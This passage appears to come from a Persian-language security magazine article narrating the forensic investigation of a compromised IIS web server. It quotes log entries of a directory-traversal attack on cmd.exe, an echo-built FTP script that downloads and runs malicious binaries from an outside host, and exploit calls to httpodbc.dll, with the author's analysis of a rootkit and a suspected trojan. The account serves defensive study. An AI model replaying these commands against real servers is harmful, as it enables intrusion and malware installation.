    ‫‪ NT/2K/XP‬ﺍﺟـﺮﺍ ﻭ ﻧﺼـﺐ ﻛﻨـﻴﺪ‪ .‬ﺑﻪ ﻋﺒﺎﺭﺕ ﺩﻳﮕﺮ ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭ‪ ،‬ﺭﻭﻳﺎﻫﺎﻱ ﻳﻚ ﻫﻜﺮ ﺭﺍ ﺑﻪ ﺣﻘﻴﻘﺖ ﺗﺒﺪﻳﻞ‬
    ‫ﻣﻲﻛﻨﺪ‪ .‬ﺑﺎ ﻧﺼﺐ ﻛﺮﺩﻥ ﻳﻚ ‪ Root Kit‬ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺳﺮﻭﻳﺲ‪ ،‬ﻫﻜﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻄﻮﺭ ﺳﺎﺩﻩﺍﻱ ﺗﻀﻤﻴﻦ ﻛﻨﺪ ﻛﻪ‬
    ‫‪ Root Kit‬ﺣﺘﻲ ﺩﺭ ﺻﻮﺭﺕ ‪ Reboot‬ﺷﺪﻥ ﺳﺮﻭﺭ ﻫﻢ ﺍﺟﺮﺍ ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬

    ‫ﺷﻜﻞ ‪٢‬‬
    ‫ﻧﺘﺎﻳﺞ ﺑﺎﺯﮔﺸﺘﻲ ‪ NetStat‬ﺑﺮ ﺭﻭﻱ ﺳﺮﻭﻳﺲ ﻫﻚ ﺷﺪﻩ‪.‬‬

    ‫ﺩﺭ ﻧﻬﺎﻳـﺖ ﺷـﺮﻭﻉ ﺑـﻪ ﻛﺎﻭﺵ ﺩﺭﻭﻥ ﺳﺮﻭﺭ ﻛﺮﺩﻡ ﺗﺎ ﺑﺒﻴﻨﻢ ﻣﻲﺗﻮﺍﻥ ﭼﮕﻮﻧﮕﻲ ﻭﺭﻭﺩ ﻫﻜﺮ ﺭﺍ ﺑﺪﺳﺖ‬
    ‫ﺁﻭﺭﺩ ﻳﺎ ﺧﻴﺮ‪ .‬ﺑﺎ ‪ Log‬ﻫﺎﻱ ﺳﺮﻭﺭ ﻭﺏ ﺷﺮﻭﻉ ﻛﺮﺩﻩ ﻭ ﻭﺭﻭﺩﻱﻫﺎﻳﻲ ﺭﺍ ﺩﺭ ﻟﻴﺴﺖ ‪ ١‬ﭘﻴﺪﺍ ﻛﺮﺩﻡ‪.‬‬

    ‫]‪209.115.xxx.xxx, -, 10/31/02, 16:01:11, W3SVC, EXCHANGE, 64.3.xxx.xxx, [ccc‬‬

    ‫‪4‬‬ ‫‪www.WebSecurityMgz.com‬‬
    ‫ﺭﻭ ﺩﺭ ﺭﻭﻱ ﺍﻧﻮﺍﻉ ﻫﻜﺮ‬

    ‫]‪859, 156, 331, 200, 0, GET, /scripts/..%5c..%5cwinnt/system32/cmd.exe, [ccc‬‬


    ‫‪/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\script.exe,‬‬

    ‫]‪209.115.xxx.xxx, -, 10/31/02, 16:02:44, W3SVC, EXCHANGE, 64.3.xxx.xxx, [ccc‬‬


    ‫]‪83250, 270, 148, 200, 0, GET, /scripts/script.exe, [ccc‬‬
    ‫>‪/c+echo+open+209.184.xxx.xxx>tmp2&&echo+anonymous>>tmp2&&echo+a@a.com‬‬
    ‫‪>[ccc]tmp2&&echo+get+httpodbc.dll>>tmp2&&echo+get+tk1.exe>>tmp2&&echo+bye‬‬
    ‫‪>>[ccc]tmp2&&echo+ftp+-s:tmp2>>tmp2.cmd&&echo+exit>>tmp2.cmd&&tmp2.cmd,‬‬

    ‫]‪209.115.xxx.xxx, -, 10/31/02, 16:06:11, W3SVC, EXCHANGE, 64.3.xxx.xxx, [ccc‬‬


    ‫]‪703, 170, 572, 200, 0, GET, /scripts/httpodbc.dll, [ccc‬‬
    ‫]‪MfcISAPICommand=Exploit&cmd=c%3A%5Cwinnt%5Csystem32%5Ccmd.exe+%[ccc‬‬
    ‫‪2Fc+c%3A%5Cinetpub%5Cscripts%5Ctk1.exe,‬‬

    ‫]‪209.115.xxx.xxx, -, 10/31/02, 16:06:26, W3SVC, EXCHANGE, 64.3.xxx.xxx, [ccc‬‬


    ‫]‪828, 174, 576, 200, 0, GET, /scripts/httpodbc.dll, [ccc‬‬
    ‫]‪MfcISAPICommand=Exploit&cmd=c%3A%5Cwinnt%5Csystem32%5Ccmd.exe+%[ccc‬‬
    ‫‪2Fc+del+c%3A%5Cinetpub%5Cscripts%5Ctk1.exe,‬‬

    ‫ﺑـﺎ ﺩﺭ ﻧﻈـﺮ ﮔﺮﻓﺘﻦ ﻭﺭﻭﺩﻱﻫﺎ ﺑﻪ ﺻﻮﺭﺕ ﻳﻚ ﻣﺴﻴﺮ‪ ،‬ﺑﻪ ﭘﻮﺷﻪﺍﻱ ﻣﺸﺨﺺ ﺭﺳﻴﺪﻩ ﻭ ﺩﺭ ﺁﻧﺠﺎ ﺳﻪ‬
    ‫ﻓـﺎﻳﻞ ‪ tmp2.cmd ، tmp2‬ﻭ ‪ httpobdc.dll‬ﺭﺍ ﻳﺎﻓﺘﻢ‪ .‬ﺩﻭ ﻓﺎﻳﻞ ﺍﻭﻝ ﺭﺍ ﺩﺭ ﺑﺮﻧﺎﻣﻪ ‪ NotePad‬ﺑﺎﺯ ﻛﺮﺩﻩ ﻭ‬
    ‫ﻓﻬﻤـﻴﺪﻡ ﻛـﻪ ﺍﺯ ﺁﻥ ﺩﻭ‪ ،‬ﻳﻜـﻲ ﻓﺎﻳﻞ ﺩﺳﺘﻮﺭﺍﺕ ‪ Ftp‬ﺑﻮﺩﻩ ﻭ ﺩﻳﮕﺮﻱ ﻳﻚ ﻓﺎﻳﻞ ﺩﺳﺘﻪﺍﻱ )‪ (Batch‬ﻣﻲﺑﺎﺷﺪ ﻛﻪ‬
    ‫ﻓﺎﻳﻞﻫﺎﻱ ‪ tk1.exe‬ﻭ ‪) httpodbc.dll‬ﻓﺎﻳﻠﻲ ﻛﻪ ﻋﻤﻮﻣﺎ ﺗﻮﺳﻂ ﻛﺮﻡ ‪ Nimda‬ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ(‬
    ‫ﺭﺍ ‪ download‬ﻛـﺮﺩﻩ ﺍﺳـﺖ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻓﺎﻳﻞ ﺩﺳﺘﻮﺭﺍﺕ ‪ Ftp‬ﺑﻪ ﺳﺮﻭﺭﻱ ﺍﺷﺎﺭﻩ ﺩﺍﺷﺘﻨﺪ ﻛﻪ ﺍﺯ ﺷﻨﺎﺳﻪﺍﻱ‬
    ‫ﻋﻤﻮﻣـﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩ‪ ،‬ﻣﻦ ﻫﻢ ﺑﻪ ﺳﺮﻭﺭ ‪ Ftp‬ﻛﻪ ﻫﻨﻮﺯ ﺩﺭ ﺣﺎﻝ ﺍﺟﺮﺍ ﺑﻮﺩ ﻭﺍﺭﺩ ﺷﺪﻩ ﻭ ﻳﻚ ﻛﭙﻲ ﺍﺯ ﻓﺎﻳﻞ‬
    ‫ﺑﺮﺍﻱ ﻛﻨﺪ ﻭ ﻛﺎﻭﻫﺎﻱ ﺁﻳﻨﺪﻩ ﺧﻮﺩ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻡ‪.‬‬
    ‫ﺑـﺎ ﺍﺩﺍﻣـﻪ ﺟﺴﺘﺠﻮﻱ ﺧﻮﺩ ﺩﺭ ﺳﺮﻭﺭ‪ ،‬ﺑﺮﺍﻳﻢ ﺍﺛﺒﺎﺕ ﺷﺪ ﻛﻪ ﻣﺸﺨﺼﺎ ﻫﻚ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺩﻟﻴﻞ ‪Offline‬‬
    ‫ﺑـﻮﺩﻥ ﺳـﺮﻭﺭ ﻭﺏ ﻭ ﻫﻤﭽﻨﻴﻦ ﺑﺎﺯ ﺑﻮﺩﻥ ﺩﻭ ﭘﻮﺭﺕ ﺟﺪﻳﺪ ﺑﺮ ﺭﻭﻱ ﺳﺮﻭﺭ ﺑﻮﺩﻩ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺗﺼﻮﺭ ﺑﺮ ﺍﺳﺎﺱ‬
    ‫ﺍﻳـﻦ ﻭﺍﻗﻌﻴـﺖ ﺷـﻜﻞ ﮔﺮﻓـﺖ ﻛـﻪ ﻋﻤﻞ ‪ Download‬ﻓﺎﻳﻞ ‪ tk1.exe‬ﺛﺎﻧﻴﻪﻫﺎﻳﻲ ﻗﺒﻞ ﺍﺯ ﺧﺎﻟﻲ ﺷﺪﻥ ‪ log‬ﻓﺎﻳﻞ‬
    ‫ﺳـﺮﻭﺭ ﻭﺏ ﺭﺥ ﺩﺍﺩﻩ ﺑـﻮﺩ‪ ،‬ﻫﻤﭽﻨﻴﻦ ﺳﺮﻭﺭ ‪ Ftp‬ﻛﻪ ﺩﺭ ﺁﻥ ﻣﻮﻗﻊ ﺑﺮ ﺭﻭﻱ ﭘﻮﺭﺕ ‪ 65130‬ﺩﺭ ﺣﺎﻝ ﺍﺟﺮﺍ ﺑﻮﺩ‪،‬‬
    ‫ﻳﻚ ﻋﻤﻞ "‪ "TK DISTRO‬ﺭﺍ ﻧﺸﺎﻥ ﻣﻲﺩﺍﺩ‪.‬‬
    ‫ﺩﺭ ﺍﻳـﻦ ﺯﻣـﺎﻥ‪ ،‬ﻣـﻦ ﺁﻣـﺎﺩﻩ ﺭﻓﺘـﻦ ﺑـﻪ ﺧﺎﻧـﻪ ﺷﺪﻡ‪ .‬ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻧﺘﺎﻳﺞ ﺑﺪﺳﺖ ﺁﻣﺪﻩ ﺍﺯ ‪ NetStat‬ﻭ‬
    ‫ﺍﻃﻼﻋﺎﺕ ﺟﺪﻳﺪ ﻛﺴﺐ ﺷﺪﻩ ﻣﺮﺑﻮﻁ ﺑﻪ ﻓﺎﻳﻞ ﻣﺒﻬﻢ ‪ TK‬ﺣﺪﺱ ﻣﻲﺯﺩﻡ ﻛﻪ ﺍﻳﻦ ﻋﻤﻞ ﺑﺨﺼﻮﺹ ﻫﻚ‪ ،‬ﻳﻚ ﺍﺳﺐ‬
    ‫ﺗـﺮﻭﺍﻱ ﻣﺮﻛـــﺐ ‪ Ftp/Back Door/IRC‬ﺍﺳـﺖ ﻛـﻪ ﻫﻤﮕـﻲ ﺩﺭ ﻳـﻚ ﻓـﺎﻳﻞ ﺩﻗﻴﻖ )‪ (tk1.exe‬ﺟﻤﻊﺁﻭﺭﻱ‬
    ‫ﺷﺪﻩﺍﻧﺪ‪ .‬ﺑﻪ ﻫﺮﺣﺎﻝ ﺍﻳﻦ ﺗﺌﻮﺭﻱ ﺑﻪ ﻧﻈﺮ ﻣﻌﺘﺒﺮ ﻣﻲﺭﺳﻴﺪ‪.‬‬

    ‫‪5‬‬ ‫‪www.WebSecurityMgz.com‬‬

    You might also like